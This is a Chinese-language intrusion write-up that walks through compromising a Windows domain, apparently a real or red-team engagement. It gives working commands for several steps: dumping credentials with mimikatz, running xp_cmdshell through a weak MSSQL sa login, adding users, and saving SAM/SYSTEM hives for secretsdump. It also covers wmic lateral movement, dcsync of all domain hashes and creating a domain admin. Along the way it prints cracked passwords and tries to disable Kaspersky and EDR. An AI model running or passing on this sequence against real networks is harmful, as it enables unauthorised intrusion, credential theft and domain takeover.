記一次常規的域滲透

1.入口是weblogic，上線無殺軟，不再贅述寫webshell和下載馬子的過程，因此直接到上線cs：

一上來不要大規模的掃描，先對網絡環境進行信息收集，發現沒有域環境：

systeminfo

使用cs自帶的mimikatz功能導出密碼：

cs: logonpasswords

對該網段使用該憑證進行pth橫向（通過hash進行傳遞）：

該網段均橫向失敗，對fscan掃描結果進行數據處理，發現內網存在域和exchange，且沒有弱口令，嘗試對掃描出來的17-010和spring漏洞測試均嘗試失敗：

于是使用frp掛上代理進內網掃描弱口令

發現一個弱口令，嘗試鏈接，成功登錄并命令執行，但是是服務權限：

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "whoami"

使用自帶的clr_efspotato，提權失敗：

23.exe 20.20.20.17 sa sa@12345 master clr_efspotato "whoami"

嘗試使用SharpSQLTools上傳提權文件，通過提權文件進行添加用戶，遠程桌面登陸后，手動執行beacon.exe

23.exe 20.20.20.17 sa sa@12345 master sourcefile destationfile

提權成功后接下來嘗試添加用戶：(這里引號需要轉義，多加一個引號即可)

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "cmd.exe /c 666.exe ""net user jijida admin!@#45""

okkkkkkkkkk，嘗試登錄：

發現卡巴斯基和edr，直接關閉：

私密馬賽，我沒能關掉，嘗試通過導出密碼拿下高用戶的權限：

reg save hklm\sam sam.hivereg save hklm\system system.hive

本地secertdump解密這里我是從遠程桌面托文件下來所以很卡，只選擇下載了兩個文件，security可以選擇不下載：

python secretsdump.py -system system.hive -sam sam.hive local

administrator賬戶進行解密得到密碼：@Nn031985

成功拿到管理員權限，在當前權限下繼續使用當前賬戶進行橫向：

發現17，20，25，57都可以橫向

在57上發現域環境：

存在卡巴斯基，直接關閉，上傳beacon.exe:

上線cs：

使用當前會話進行信息收集，導出密碼的過程中發現一些郵箱口令：

注入域管進程：

在域管進程下進行域環境的信息收集，先查域管：

net group "domain admins" /domain

域成員：

net user /domain

找域控：

ping dc

這里不選擇添加賬戶密碼的話，默認選擇當前權限（域管權限）進行橫向：

wmic /mode:20.20.20.85 os get name

導出域內所有用戶hash，這里使用mimikatz自帶的dcsync功能：

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

20上有個exchange服務，嘗試對20進行橫向滲透：

建立ipc鏈接后，使用UNC路徑傳馬：

\\ip\C$\

成功上線：

wmic /node:20.20.20.20 process call create "cmd.exe /c beacon.exe"

傳馬子：

上線：

新建一個域管：

3389嘗試登錄：